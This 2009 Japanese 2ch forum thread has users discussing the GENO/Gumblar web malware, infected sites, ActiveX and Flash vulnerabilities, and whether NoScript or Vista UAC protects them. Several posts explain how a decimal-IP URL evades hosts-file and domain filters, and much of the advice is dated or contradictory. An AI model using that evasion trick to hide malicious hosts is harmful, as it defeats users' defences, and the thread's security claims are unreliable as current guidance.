IE×Firefox×Opera×Safari×Chrome 最終戦争7回戦
http://pc12.2ch.net/test/read.cgi/software/1246005705/119
156名無しさん@お腹いっぱい。:2009/07/07(火) 12:05:12
>>151
ありがとうございます

自分のパソコンに関しては、とりあえずクリーンインストールをしようと思います

ただ今回、ログインページに仕掛けられてたみたいなので…

サイトのファイルを他へ移転できたとしても…
サーバーに預けてるドメインを、ログインしないと移管出来ないのがきついですね
157名無しさん@お腹いっぱい。:2009/07/07(火) 13:22:46
おたくのスレにあったレスを頼りに情報たどっていくと
このページに行き着くけど、恐いから直リンや止めとくわ
ttps://www●value-domain.com/howto/?action=transfer(●は.)
一応view-source:で、おたくのスレの85-86が入ってないのは見た
ソース見れるなら自分で確認してほしい。自己責任で
158名無しさん@お腹いっぱい。:2009/07/07(火) 13:43:10
>>152
パッチ済みじゃないよ
Microsoft ビデオの ActiveX コントロール脆弱性により、リモートでコードが実行される.
http://www.microsoft.com/japan/technet/security/advisory/972890.mspx

対策方法はこちら
http://support.microsoft.com/kb/972890/

なるべくならIEを使わないほうが良いらしい
159名無しさん@お腹いっぱい。:2009/07/07(火) 14:08:32
>>158
またVISTAは相手にされなかったのか・・・
160名無しさん@お腹いっぱい。:2009/07/07(火) 14:12:56
>>158
誤読してました。ちゃんと未パッチの脆弱性
ってありましたね。お手数をおかけしました
161名無しさん@お腹いっぱい。:2009/07/07(火) 21:50:39
>>159
ユーザ少ないし、セキュリティ強めだから手間掛けるまでも無いってか。
それにWindowsUpdateでパッチしにくい脆弱性が発見されていると仮定して、今その穴を使ったら出荷前の普及するだろう7で対策される公算が高いわけで。
162名無しさん@お腹いっぱい。:2009/07/08(水) 05:41:51
今更だがfirefoxのnoscriptは信頼できないサイトと信頼できるサイトの制限設定が排他処理じゃないなのが問題だな
これだと、許可サイトは強制的に全てを許可されるからOSがXPだと少々怖い
operaの方が妥当かもしれない
信頼サイトにも個別に制限出来るようにすべき
163名無しさん@お腹いっぱい。:2009/07/08(水) 11:07:30
本末転倒かも知れんが、NoScriptとAdblockの併用いいよ
164名無しさん@お腹いっぱい。:2009/07/08(水) 13:55:25
NoScript と YesScript を併用すりゃいいんじゃね?
165名無しさん@お腹いっぱい。:2009/07/08(水) 14:31:17
YesScriptは、URLをブラックリスト登録して初めてJavaスクリプトが無効にできる
サイトがころころ変ってしまうような場合は無力だよね
166名無しさん@お腹いっぱい。:2009/07/08(水) 14:37:59
Adblockは、直接埋め込まれたjavascriptは無効にできないよね
ブロックするのが外部のjsだけなら簡単なんだけどね
167名無しさん@お腹いっぱい。:2009/07/08(水) 14:48:05
>直接埋め込まれたjavascriptは無効にできない
あああああああああああああああああああああああああああああああああ
168名無しさん@お腹いっぱい。:2009/07/08(水) 16:35:37
じゃあどうすりゃいいのよ

誰か対策まとめてくれ
169名無しさん@お腹いっぱい。:2009/07/08(水) 17:05:33
【韓国】青瓦台、国会、国防部、ネイバーなど25サイトにDDoS攻撃[07/08]
http://takeshima.2ch.net/test/read.cgi/news4plus/1247014272/
170名無しさん@お腹いっぱい。:2009/07/08(水) 17:27:59
ax.xrea.comが感染か
>>168
OSをvistaに変更
171名無しさん@お腹いっぱい。:2009/07/08(水) 17:33:21
>>168
LANケーブル引っこ抜く
172名無しさん@お腹いっぱい。:2009/07/08(水) 17:45:59
RequestPolicyは?
173名無しさん@お腹いっぱい。:2009/07/08(水) 17:46:58
あれ、凄い使い難い
174名無しさん@お腹いっぱい。:2009/07/08(水) 17:55:07
>>170
XPのパソコンをVistaにアップグレードするのも意外と危険なんだよね
うまくインストできてもXPで当たり前のようにできていたことができなくなるし
175名無しさん@お腹いっぱい。:2009/07/08(水) 17:56:55
ha?
176名無しさん@お腹いっぱい。:2009/07/08(水) 18:04:19
>>172
Operaに似たような機能が標準で付いているけれど
動画サイトで使うの大変だよ
177名無しさん@お腹いっぱい。:2009/07/08(水) 18:12:30
xreaは今朝アクセスしたら確かにノートン先生が大怒りだったな 
activeX系だからvistaは対象外だが
178名無しさん@お腹いっぱい。:2009/07/09(木) 00:22:29
おいおい、Adobe関連は全て最新にしてたのに感染したっぽい
しかもブラウザどころか最早タスクマネージャすら起動しない始末
どうしろと
179名無しさん@お腹いっぱい。:2009/07/09(木) 00:56:45
使用OS、ブラウザ、javascriptの有無を
まぁ、別件でxreaのようなタイプ(activex経由)なら感染は有り得る
180名無しさん@お腹いっぱい。:2009/07/09(木) 01:35:54

>>178
ActiveXからやられたんだろ
181名無しさん@お腹いっぱい。:2009/07/09(木) 02:14:46
Adobeだけ最新なら別のものじゃないの
182名無しさん@お腹いっぱい。:2009/07/09(木) 09:08:26
183名無しさん@お腹いっぱい。:2009/07/09(木) 14:31:38
そもそも何に感染したかわかってないようだし
症状的にも今回のもの(新種ではなく旧来のキーロガー)と違う感じなので
別の何かではないかと
184名無しさん@お腹いっぱい。:2009/07/09(木) 19:48:28
タスク自体重いのならマザーボードがお逝きになる寸前かもね
185名無しさん@お腹いっぱい。:2009/07/10(金) 01:12:49
ディスプレイで虫みたいなのがグルグル動きまくってて何か感染したのかとおもったら
本物の虫だった
186名無しさん@お腹いっぱい。:2009/07/10(金) 02:28:33
これが北朝鮮の選択か…米韓への田代砲攻撃、止まる気配なし
http://tsushima.2ch.net/test/read.cgi/news/1247153428/
187名無しさん@お腹いっぱい。:2009/07/10(金) 13:58:37
xreaのアクセス解析にアクセスしましたが、私のパソコンに感染はしていないみたいです
アクセス解析は大丈夫なんでしょうか…。
188名無しさん@お腹いっぱい。:2009/07/10(金) 14:22:12
【アクセス解析】AccessAnalyzer.com Part5【XREA】
http://pc11.2ch.net/test/read.cgi/hp/1234096306/
189名無しさん@お腹いっぱい。:2009/07/11(土) 06:02:29
>>188
ここ開いただけでavast!が反応する..ガクガクグルグル
190名無しさん@お腹いっぱい。:2009/07/11(土) 19:28:05
もう怖いから夜のエロサイト以外見ないようにする
191名無しさん@お腹いっぱい。:2009/07/11(土) 21:45:15
いや、そのエロサイトが危ないんだがwww
192名無しさん@お腹いっぱい。:2009/07/12(日) 00:44:36
ファイル共有ソフト「Share」が何者かに攻撃を受けフリーズしまくる 2PB
http://tsushima.2ch.net/test/read.cgi/news/1247162852/
193名無しさん@お腹いっぱい。:2009/07/12(日) 01:46:37
情報もれてもいいシュミ用のパソコン用意すればいいんだよ
194名無しさん@お腹いっぱい。:2009/07/13(月) 11:25:14
廃れた
195名無しさん@お腹いっぱい。:2009/07/13(月) 16:28:31
【share】 sharebot丸の内OCN監視スレ 【洒落】
http://hideyoshi.2ch.net/test/read.cgi/download/1247399721/
196名無しさん@お腹いっぱい。:2009/07/15(水) 22:33:32
決闘勝利おめwww
197名無しさん@お腹いっぱい。:2009/07/15(水) 22:34:51
誤爆。。
198名無しさん@お腹いっぱい。:2009/07/16(木) 02:42:31
http://pc11.2ch.net/test/read.cgi/sec/1243346768/686
>javascript単体でどうこうするウィルスは確かにほとんど居ないが、脆弱性自体はあるし、あった。
>ウィルスではないが、XSSなどはjavascript経由で発症する物がほとんどであるし、切る事で安全性は確実に高まります。

実例

http://slashdot.jp/security/09/07/15/0449234.shtml
Firefox 3.5のJavaScriptエンジンに未対策の脆弱性が発見される。

最近のJavaScript高速化戦争の弊害だな、こりゃ。
素直に実装するだけならそれなりに枯れて安全になってきていた筈だからな。
199名無しさん@お腹いっぱい。:2009/07/16(木) 12:00:17
TraceMonkeyによるJSの高速化も3.5の売りだから
枯れてないのは仕方がない。
3.0(笑)ではChromeのV8に相手すらしてもらえない。
200名無しさん@お腹いっぱい。:2009/07/16(木) 13:55:16
結局インフルエンザと同じぐらいに収まったな
作ったヤシの全面負けでFA?
201名無しさん@お腹いっぱい。:2009/07/16(木) 19:24:00
genoウイルススレがいくつも立ったのだから作ったやつの勝ちだろ
202名無しさん@お腹いっぱい。:2009/07/16(木) 19:35:57
アフィは儲かったんだろうか

・・・・・あれ?
203名無しさん@お腹いっぱい。:2009/07/16(木) 19:49:49
買わなきゃ入らないamazonでは厳しい
情弱が来るジャンルでもあんまないし
やはりゲームアニメのがいいわ
204名無しさん@お腹いっぱい。:2009/07/16(木) 19:50:26
収まっていないようでして・・

パソコンは問題ないようですが
HPが何度も改竄されます。
パスワードを変えても、すぐ見破られてしまいます。

どしたらいいんでしょう



205名無しさん@お腹いっぱい。:2009/07/16(木) 19:51:48
そんなやばすぎるHPは一旦閉鎖しろ
206名無しさん@お腹いっぱい。:2009/07/16(木) 19:57:38
まだあんのか、このすれw
207名無しさん@お腹いっぱい。:2009/07/16(木) 19:57:45
>>204
VALUE DOMAINってどうよ? part35
ttp://pc11.2ch.net/test/read.cgi/hosting/1247663722/

【アクセス解析】AccessAnalyzer.com Part6【XREA】
ttp://pc11.2ch.net/test/read.cgi/hp/1247279199/
208名無しさん@お腹いっぱい。:2009/07/16(木) 20:16:42
何で今になって
209名無しさん@お腹いっぱい。:2009/07/16(木) 22:17:37
>>204
問題ないかどうかは本当に確認した?OS入れなおした?
それ以外なら>>207関連かな
210名無しさん@お腹いっぱい。:2009/07/17(金) 01:38:29
>>203
アニオタゲーオタって無知な奴多いのか
211名無しさん@お腹いっぱい。:2009/07/17(金) 02:03:33
>>204
感染したままでパス変更してるか、感染したPCで更新作業してるかだろ。
HPは全ファイル削除→PCリカバリ→ftpパス変更→HPにファイル戻し
212名無しさん@お腹いっぱい。:2009/07/17(金) 02:05:32
>>210
ガキがくるからな
213名無しさん@お腹いっぱい。:2009/07/17(金) 14:26:59
アバストが反応してJS:Redirector-H4 [Trj]を検出しましたと出た。
ブロックしてくれたから良かったけど。
214名無しさん@お腹いっぱい。:2009/07/17(金) 14:35:08
それは報告しなくていいです
215名無しさん@お腹いっぱい。:2009/07/17(金) 14:49:46
私の戦闘力は530000です
216名無しさん@お腹いっぱい。:2009/07/17(金) 17:39:31
私の愛馬は凶暴です
217名無しさん@お腹いっぱい。:2009/07/18(土) 22:34:41
>>215
とっとと本気出せよオカマ野郎
218名無しさん@お腹いっぱい。:2009/07/19(日) 08:56:28
アンラボ■■■【アンラボ】V3ウイルスブロック Part6■■■
http://pc11.2ch.net/test/read.cgi/sec/1207926691/

これきくんだろうか
219名無しさん@お腹いっぱい。:2009/07/19(日) 09:03:51
さぁ
220名無しさん@お腹いっぱい。:2009/07/19(日) 18:34:03
ウィルスブロック2005を更新するのわすれてて2005のままの私が通ります。
221名無しさん@お腹いっぱい。:2009/07/24(金) 00:03:17
【GENO】 またFlash Playerの脆弱性を突いたウイルス出現
http://tsushima.2ch.net/test/read.cgi/news/1248360445/
222名無しさん@お腹いっぱい。:2009/07/24(金) 02:00:02
vistaの一人勝ち
まぁ、それくらいのメリットがないと救いようのない地雷OSだからね
223名無しさん@お腹いっぱい。:2009/07/24(金) 02:07:11
マジ糞すぎる
Adobe潰せ
224名無しさん@お腹いっぱい。:2009/07/24(金) 02:10:24
Silverlight, XPS の MS の時代を望んでいるんですか?
225名無しさん@お腹いっぱい。:2009/07/24(金) 02:40:21
djvuもたまには思い出してあげてくださいね
226名無しさん@お腹いっぱい。:2009/07/24(金) 03:42:14
silverlightは某動画サイト(現在、閉鎖)にも採用されていたから意外と面白いかもしれんが
開発環境が厳しいらしいな
227名無しさん@お腹いっぱい。:2009/07/24(金) 18:06:20
GenoウイルスNineballとは関係ないんで、スレ違いなんだが、
最近、Firefoxが謎のIPと 暗号化通信 している。

209.134.161.75
なんだが、Whoisにかけると Internet Security Systems とかいう知らないドメインらしい。
気持ち悪すぎるんだが、だれか分かる人いない?
ググルと、同名のIBMが買収した組織が存在するようだが、同名ってだけで同じとは考えにくい。

こういうことが質問できるスレでも構わないからアドバイスが欲しいっす。
228名無しさん@お腹いっぱい。:2009/07/24(金) 18:54:47
firefoxじゃなくセキュリティソフトの鯖の可能性があるね
229名無しさん@お腹いっぱい。:2009/07/24(金) 19:08:52
>>228
レスありがとう。
でも、そのセキュリティーソフト(Kaspersky)で>>227をモニターしているんだ。
それで通信しているアプリがFirefoxだと表示されちゃう。

通信先のサーバーもKasperskyのものではないみたいだし、
googleのセーフブラウジングでも、Firefoxの更新を確認するためにモジラのサイトと通信しているのでもない
みたいで気持ちわるいっす。
230名無しさん@お腹いっぱい。:2009/07/24(金) 19:37:20
じゃあ、アドオン、2chブラウザ、無線LAN、メーカー製PCなら常駐アプリがバックグラウンドでアドウェアのような事をやってるとか
うちもfirefox3.0.12(OSはvista)だがそういう挙動は一切ないな
231名無しさん@お腹いっぱい。:2009/07/24(金) 19:50:04
>>230
レスありがとう。
Firefox3.0.12で問題ないって情報だけでも助かる。
今は3.51を使っているけど、そっちの環境も残してあるので確認してみる。

一番ヤバイのはFirefoxの通信と偽ってアドウェアが通信していることだよね。

ところで、
>そういう挙動は一切ないな
はどうすれば確認できる?
232名無しさん@お腹いっぱい。:2009/07/24(金) 20:12:15
firefoxスレで訊いたら?
233名無しさん@お腹いっぱい。:2009/07/24(金) 22:24:32
>>227
>同名のIBMが買収した組織が存在するようだが、同名ってだけで同じとは考えにくい。
考えにくいというのは何で?
正引き逆引き一致でwebapp.iss.netなんだけどあやしいの?

アドオン何いれてるの?
アドオンなしでもその通信発生するの?

P2Pやエロサイト巡回で不審な動作をしたなど心当たりがあるなら
素直にOS入れなおしたほうが安心だと思うよ
234231:2009/07/24(金) 23:55:20
>>233
わざわざ試してくれてありがとう。

自分でやったら一致しなかったんだ。 おかしいよね。
どこのwhois使っても同じ結果になるはずだけど、 良かったら どこで検索したか教えてくれない?

>素直にOS入れなおしたほうが安心だと思うよ
自分もまったくその通りだと思う。
ただ、面倒だから自分の勘違いだったり、まっとうな理由が見つかればいいなぁと思っている。

>P2Pやエロサイト巡回で不審な動作をしたなど心当たりがあるなら
一般的にヤバイとされるサイトには行っていないし、プラグインも全オフ状態。
FirefoxアドオンのNoScriptが"ざる状態"らしいと知った昨日からはJavaScriptも切っている。

ただ、>>230さんの言うように、3.0.12の時にはこんな通信していなかったはずだと自分も思っていた。
思い当たるきっかけといえば 3.50以降にアップしてから ってことになっちゃう。
もちろん、そのタイミングで何かに感染したのかもしれないけど・・・。

アドオン関連は3.0.12と3.51で同じのしか入れてないから、
3.0.12で試して その後、アドオン全オフの3.51環境を試してみます。

気まぐれに通信開始を試みている感じなので、検証には時間かかると思います。

一番良い結果は、これまでに書いたことが勘違いで、
通信先のInternet Security Systems が安全なサイト プラス 何かのアドオンがそこのデータを利用していることですね。

>>233 さんの書き込みで希望が見えてきました!
235名無しさん@お腹いっぱい。:2009/07/25(土) 00:06:17
>>234
http://www.cman.jp/network/support/ip.html

いい加減スレチだしFirefox関連スレでアドオンさらしたほうが早いと思うけどね
236名無しさん@お腹いっぱい。:2009/07/25(土) 00:11:29
>>235
thankyou!
237名無しさん@お腹いっぱい。:2009/07/25(土) 04:01:32
Noscriptがざるだって初めて聞いたけどFirefox関連でボロクソいわれてるなあ
別のアドオン探すか
238名無しさん@お腹いっぱい。:2009/07/25(土) 06:31:43
Noscriptってザルなの?
239名無しさん@お腹いっぱい。:2009/07/25(土) 10:29:28
おれfirefox関連スレのROM専だけど、向こうでNoScriptをなんやかんや言ってるやつはPC初心者板並のスキルだと思うよ
240名無しさん@お腹いっぱい。:2009/07/25(土) 12:00:45
opera使えよ

コピペ禁止スクリプトなんて余裕で貫通する最強ブラウザだ
241名無しさん@お腹いっぱい。:2009/07/25(土) 15:28:00
opensauceなんだからdiffしてくださいな
242名無しさん@お腹いっぱい。:2009/07/25(土) 20:07:26
>>239
スレはみてないけどほかで検証されてるから初心者云々関係ないよ
NoScript すり抜けでぐぐればすぐ出てくる
243名無しさん@お腹いっぱい。:2009/07/25(土) 20:17:17
noscriptは許可サイトは丸裸
非許可サイトもIFRAMEをスルーしてしまう問題がある(最新verでも同様)
完全に気休めアドオンだね
本当に信用出来るのはブラウザでもアドオンでもセキュリティソフトでもなくvistaのUAC先生だけ
firefoxが駄目ならoperaに移るか!という浅はかな考えを抱いているとXPユーザーは痛い目に合う可能性がある
244名無しさん@お腹いっぱい。:2009/07/25(土) 22:08:40
安全性だけなら2000でもXPでも制限ユーザーで動かせば同じじゃないか?
245名無しさん@お腹いっぱい。:2009/07/25(土) 22:23:32
管理者権限をのっとってry
246名無しさん@お腹いっぱい。:2009/07/25(土) 22:26:57
http://2749172507/
↑IEかchromeでアクセスすると変換してhttp://support.mozilla.com/ja/kb/Live+Bookmarksにつながる

HostsやURLドメインフィルタでブロックし難いようにしている、敵ながらあっぱれだよな
例えばttp://2749172507/jp.jsのように jp.js などが付いているとうっかり信用して許可サイトに登録してしまう
247名無しさん@お腹いっぱい。:2009/07/25(土) 23:02:29
>>242
NoScriptも万能じゃないし、一つに頼り切るのも危険じゃん

「NoScript すり抜け」検索のブログで検証
一応そのブログのIFRAMEは完全にブロックできてた(下記画像Firefox3.5.1)
http://up2.viploader.net/pic/src/viploader1100692.jpg
248名無しさん@お腹いっぱい。:2009/07/25(土) 23:46:56
>NoScriptも万能じゃない

確かに。
249名無しさん@お腹いっぱい。:2009/07/26(日) 11:30:16
あくまでも補助機能としてnoscript入れてるんだろ
誰もこれさえ入れていれば大丈夫と思ってるやつはいないだろ
250名無しさん@お腹いっぱい。:2009/07/26(日) 11:34:58
>>247
うちもブロック出来てた。
すり抜け現象はそのブログの中の人の設定ミスかなんかじゃないのか。
251名無しさん@お腹いっぱい。:2009/07/26(日) 11:45:26
なんかわからんがよs
252名無しさん@お腹いっぱい。:2009/07/26(日) 12:21:21
>>246
よく分からんが、やばそうなので、
どういうことか詳しくおしえてくれ。
253名無しさん@お腹いっぱい。:2009/07/26(日) 13:10:39
これだとマイクロソフトだと一目でわかる↓
http://www.microsoft.com/ja/jp/default.aspx
これだと解りにくい↓
http://3475948030:80/ja/jp/
上記の両方とも同じサーバーの同ページにつながる

ここで、www.microsoft.comが悪意のあるサイトと仮定する。
信頼している、ゲーム・動画サイトでFxのNoscriptがhttp://3475948030:80/ja/jp/をブロックしたとする
一般的にゲームや動画ができるまでセキュリティを弱め許可していくだろう
.cn/などのトップレベルドメインなら警戒するが、URL内にjpが入っていると比較的安心な国内鯖などと勘違いして許可してしまう恐れがある。
他には、フィルタリングソフトなどで.com/の全てをブロックしてもhttp://3475948030:80/ja/jp/はすり抜けてしまう

※上記リンクは全て信頼のマイクロソフトのサイトです。
254名無しさん@お腹いっぱい。:2009/07/26(日) 13:27:09
hosts
127.0.0.1  www.microsoft.com
フィルタリングソフト
禁止 www.microsoft.com 及び .com

上記のブロックをしても埋め込まれたhttp://3475948030:80/ja/jp/はすり抜ける
まぁ具体的なサンプルでないので解りにくかったかも知れない
255名無しさん@お腹いっぱい。:2009/07/26(日) 13:36:24
ネットもリアルと同じように詐欺が存在する。
VistaUAC、FirefoxNoscriptなどで武装しても罠にかかる人はかかる。
それぞれの特性を理解して使わなくてはいけないということでしょう。
256名無しさん@お腹いっぱい。:2009/07/26(日) 15:28:48
>>250
キャッシュファイルは完全に消してからやった?
257名無しさん@お腹いっぱい。:2009/07/26(日) 17:16:07
だいたいURLが数字ばっかのところに行くか普通
258名無しさん@お腹いっぱい。:2009/07/26(日) 21:10:41
>>257
数字でも英数字でもひらがなでも
普通は行くよ

ttp://さだまさし.jp/
259名無しさん@お腹いっぱい。:2009/07/26(日) 21:13:22
マイクロソフト・ホーム
http://tinyurl.com/microsoft-japan
260名無しさん@お腹いっぱい。:2009/07/26(日) 21:24:02
>>259
GoogleChromeは可、その他不可
261名無しさん@お腹いっぱい。:2009/07/26(日) 21:25:03
>>257-258
……(^ω^; )
262名無しさん@お腹いっぱい。:2009/07/26(日) 23:18:25
Adobe糞が7月中に対策してもまたすぐボロがでると予想
263名無しさん@お腹いっぱい。:2009/07/27(月) 06:07:39
>>258
J-Wordに犯されてるか、
アドレスバーから検索できる設定になってるIEと見た
多分後者だなw
264名無しさん@お腹いっぱい。:2009/07/27(月) 07:59:30
>>263
258は普通に日本語ドメインのことじゃないの?
265名無しさん@お腹いっぱい。:2009/07/27(月) 08:20:29
日本語ドメインだな
266名無しさん@お腹いっぱい。:2009/07/27(月) 08:33:02
どっちにしろ>>258>>257の言いたかったことがわかってないような
267名無しさん@お腹いっぱい。:2009/07/27(月) 08:49:40
こだわるなよ
268名無しさん@お腹いっぱい。:2009/07/27(月) 16:56:09
>>263
IEは7から日本語ドメインに標準で対応
J-Wordもアドレスバーに文字を入れて日本語URLの検索できるが
普通J-Wordは使わないだろ

それと2ちゃんは日本語URLが貼れても機能しないんだよな
269名無しさん@お腹いっぱい。:2009/07/27(月) 17:04:27
うちのパソコンはNoscript すり抜けはしないけれど、
保険で他にも複数IFRAME対策等を入れているから
一つや二つの対策ソフトがバグっても安心です
270名無しさん@お腹いっぱい。:2009/07/27(月) 17:09:26
こだわりやな
271名無しさん@お腹いっぱい。:2009/07/27(月) 17:15:37
シンプルかつ効果的な対策をモットーにしてますw
まだまだXPも現役だからUACに頼らない対策もしてるよ
272名無しさん@お腹いっぱい。:2009/07/27(月) 17:21:18
どこまで再現出来るかは分からないがXPユーザーでも
UACもどきな非公式ソフトやノートンの制御設定で似たような事ができるかも
273名無しさん@お腹いっぱい。:2009/07/27(月) 17:36:45
2kやXPでVistaのUACモドキなことをやってたから
Vista出たときUACの使い勝手の良さに感動したけれど
巷では最低の評価だったなぁ…
274名無しさん@お腹いっぱい。:2009/07/27(月) 18:24:17

ブログの中の人、かわいそう
だれか、助けてあげて
275名無しさん@お腹いっぱい。:2009/07/27(月) 18:25:47
あんたが余計な事をやったんじゃないの
276名無しさん@お腹いっぱい。:2009/07/27(月) 18:41:37
リカバリー推奨
277名無しさん@お腹いっぱい。:2009/07/27(月) 18:50:33
俺たちのリカバリー・ナイト
おまえリカバリ
278名無しさん@お腹いっぱい。:2009/07/28(火) 13:58:05
279名無しさん@お腹いっぱい。:2009/07/30(木) 17:08:16
どうでもいいけどセキュリティ板にFlashとadobe readerの専用スレたてろよ
どうみてもあちこち集中攻撃受けていて、今旬のこの板の花形ですがな
280名無しさん@お腹いっぱい。:2009/07/30(木) 17:21:15
必要だと思うなら自分でたてろよカス
281名無しさん@お腹いっぱい。:2009/07/30(木) 21:41:34
セキュリティ板は高スキルが求められる
厨房らには荷が重すぎたってわけよ

セキュリティソフトが扱えるだけでは芋扱いされるだけだしな
282名無しさん@お腹いっぱい。:2009/07/31(金) 05:39:13
ようやくflash playerが更新
283名無しさん@お腹いっぱい。:2009/07/31(金) 14:16:55
情報元は忘れたんだが、
watch_akibaのTwitter ↓ がよく利用している
http://twitter.com/watch_akiba

twitpic.com(174.36.0.0 - 174.37.255.255) って危ないのか分かる人いない?

数週間前にどこかのサイトを元にファイアーウォールのブロックIPにガンガン登録していったら、
この範囲をドンピシャで登録していたみたなんだが、とんでもない数の利用者が存在するはずだから、
本当にヤバイのか、自分がボケていただけなのか分からなくなった。

watch_akibaのTwitterにいって、画像リンクを踏むとtwitpic.comにつながるよ。

>>253
ペアレンタルコントロールとかで、ドメイン指定ブロックだと危ないから
リモートIPでブロックしていれば安心ってことかな?
284名無しさん@お腹いっぱい。:2009/08/01(土) 04:08:51
Adobe Reader更新きました
285名無しさん@お腹いっぱい。:2009/08/08(土) 21:58:31
 
286名無しさん@お腹いっぱい。:2009/08/15(土) 17:47:13
結局大手のアンチウイルスソフトで対策できてるところは未だにないの?
287名無しさん@お腹いっぱい。:2009/08/15(土) 21:05:12
そもそも被害者いないもん
架空のウイルス
288名無しさん@お腹いっぱい。:2009/08/17(月) 12:35:59
と思いたいgeno社員乙
289名無しさん@お腹いっぱい。:2009/08/17(月) 14:56:50
既出かもしれんが
ちんこアプロダっていう同人誌うpしてるサイトがGENOウィルスに感染してることが判明した。
たまに見てた奴とかは気をつけろよ。

しばらくはアクセスしない方がいい。
290名無しさん@お腹いっぱい。:2009/08/17(月) 22:16:20
5月の話じゃねーか。
291名無しさん@お腹いっぱい。:2009/08/17(月) 23:55:26
ちんこアプロダ
危険度0%
安全なURLです。踏んでも大丈夫でしょう。
292名無しさん@お腹いっぱい。:2009/08/19(水) 15:27:34
ウイルスバスターのフィッシングレベルを高にすれば
GENOウイルス系をほぼ100%防げるってあったけど
ウイルスバスターって意外と凄いんだな
293名無しさん@お腹いっぱい。:2009/08/19(水) 20:55:03
安全なサイトもほぼ100%ブロックされますけどね
294名無しさん@お腹いっぱい。:2009/08/20(木) 00:01:00
ttp://www.itmedia.co.jp/enterprise/articles/0908/19/news020.html
相次ぐサイト改ざん攻撃、「Genoウイルス」感染PCが関与か

原因を調べたところ、この顧客がホスティングサーバへのファイルアップロードに
使っていたPCが、「Gumblar」(別名JS-Redir、 Genoウイルス)タイプのマルウェアに
感染していたことが分かったという。ただし5月に出回ったGumblarとは異なる点もあり、
コードに手を加えた亜種の可能性もあるとしている。
295名無しさん@お腹いっぱい。:2009/08/20(木) 00:10:35
バスターって確かGENO発生当初にこのウイルス対策をユーザーから問われて
「履歴を消してください」
と答えた素敵な会社だっけ。
296名無しさん@お腹いっぱい。:2009/08/20(木) 00:14:17
>>GENOウイルス(通称)に御社は対応済でしょうか?

   ___     ∧∧
  / || ̄ ̄||  ./台 \ ・・・・
  |  ||脅威||  (ハ´;; ) 
  | ̄ ̄\三⊂/ ̄ ̄ ̄/
  |    | ( ./     /


     カタカタ カタカタ
   ___     ∧∧
  / || ̄ ̄||  /台. \ ?! GENOウイルスって何アルカ??
  |  ||安心||  (`ハ´* ) 
  | ̄ ̄\三⊂/ ̄ ̄ ̄/
  |    | ( ./     /
297名無しさん@お腹いっぱい。:2009/08/21(金) 18:26:11
バスターさんはWinnyグループの一員だからなぁ
298名無しさん@お腹いっぱい。:2009/09/03(木) 23:40:06
ほす
299名無しさん@お腹いっぱい。:2009/09/05(土) 08:00:10
■新型の「Webウイルス」が感染拡大
http://pc.nikkeibp.co.jp/article/trend/20090722/1017170/?set=rss

セキュリティ会社や組織は5月中旬、「Gumblar(ガンブラー)」などと呼ばれる新たなWebウイルス(Webページに埋め込まれるタイプのウイルス)が
世界中で感染を広げているとして注意を呼びかけた。
脆弱(ぜいじゃく)性のあるパソコンでは、Webウイルスが埋め込まれたページにアクセスするだけで被害に遭う恐れがある。実際、国内でも多くの被害が報告されている。




■09月04日のWeb改竄情報
https://www.netsecurity.ne.jp/9_13925.html
■09月03日のWeb改竄情報
https://www.netsecurity.ne.jp/9_13910.html
300名無しさん@お腹いっぱい。:2009/09/05(土) 11:20:10
あのーすみません、
当初お菓子やさんだかなんだか休日に
電凸するかとか言ってる時居たんだけど
まさかまだ放置なの?
そろそろ許してやるかってGENO見ようとしたんだけど…
301名無しさん@お腹いっぱい。:2009/09/11(金) 05:25:39
あれ、GENOウイルスチェッカーとか言うサイト繋がらないけど閉鎖したのか?
302名無しさん@お腹いっぱい。:2009/09/11(金) 05:48:34
さすが糞さいと
303名無しさん@お腹いっぱい。:2009/09/13(日) 23:39:45
再起動画面のまま、何度再起動させても電源切っても全然起動出来ないです。GENOでしょうか…
対策何もしてなかったので。
どうしたらいいのかわからないです
もうパソコンは二度と起動しないのでしようか。
304名無しさん@お腹いっぱい。:2009/09/13(日) 23:45:30
セーフモードでやってみ?
だめならCDブートだ。(OS再インストール)
305名無しさん@お腹いっぱい。:2009/09/13(日) 23:55:53
>>304 セーフモードだめです
OS再インストール…はやってないです。いつも使ってないスクリーンセーバーをダウンロード&設定した後だったのでそのせいだ 休ませれば直ると信じたかったのですが…。orz

早いレスありがとうございました。
306名無しさん@お腹いっぱい。:2009/09/14(月) 03:27:04
CMDがいつのまにか起動
パソコン重い
しかしファイルサイズは正常
別のウィルスだなこれは……
307名無しさん@お腹いっぱい。:2009/09/17(木) 14:06:43
avastで駆除できたっぽい。
sqlsodbc.chmが消えたし。win2000
308名無しさん@お腹いっぱい。:2009/09/20(日) 01:27:53
やっぱavast凄いな
309名無しさん@お腹いっぱい。:2009/09/20(日) 05:03:51
208.87.
310名無しさん@お腹いっぱい。:2009/09/20(日) 14:23:39
win2000でavastで削除してsqlsodbc.chmを消去して
その後また復元してなければ大丈夫?
311名無しさん@お腹いっぱい。:2009/09/20(日) 16:46:18
GENO感染したのですが、
個人情報流出は具体的にどの程度なんでしょうか?
保存してるファイルも流出してしまいますか?

PC素人です。
どなたか教えてください。
312名無しさん@お腹いっぱい。:2009/09/22(火) 13:00:12
梨花ブログが感染してて、連休中で対処できてないからエライことになってる。
313名無しさん@お腹いっぱい。:2009/09/22(火) 13:40:57
行ってないからわからんけど貼られてる広告にやられてるのかな
りんかもとんだとばっちりだな
314名無しさん@お腹いっぱい。:2009/09/22(火) 16:36:57
>>313
ちょうど連休前の金曜の夜からおかしくなって、スタッフも休んでるのか未対応。
メッセージもスタッフ通してから梨花に送られてるみたいで、本人も知らずに更新しまくり。
梨花スレは大混乱。
315名無しさん@お腹いっぱい。:2009/09/22(火) 16:45:44
確かGENOも休み中にやられたんだったよな
ブログ見てPCリカバリとかマジ最悪だね
PC詳しくない奴はどうするのか
自分の手に負えない奴もいっぱいいそうだ
316名無しさん@お腹いっぱい。:2009/09/22(火) 17:12:23
>>315
梨花ブログ見る層はパソコン詳しい人あんまりいなさそうだからね。
私もその1人で、不安になってこのスレ来てみました。
ファイル名を指定して確認?したら一応大丈夫そうだったけど、亜種もあるみたいだから油断できませんよねー
ほんとうろたえてますw
317名無しさん@お腹いっぱい。:2009/09/22(火) 17:17:57
FlashPlayerは最新に
PDFReaderも最新に
JavaScriptは基本的に切っておく
これでだいたいは防げるはず
初心者はIEを使うよりもFireFox+NoScript使用のほうが安全
318名無しさん@お腹いっぱい。:2009/09/22(火) 19:51:19
コマンドプロンプトが立ち上がればよかった筈だが
319名無しさん@お腹いっぱい。:2009/09/22(火) 20:58:13
vistaにしてUACを使う
が一番いい
320名無しさん@お腹いっぱい。:2009/09/23(水) 00:45:48
vista+UAC+砂箱
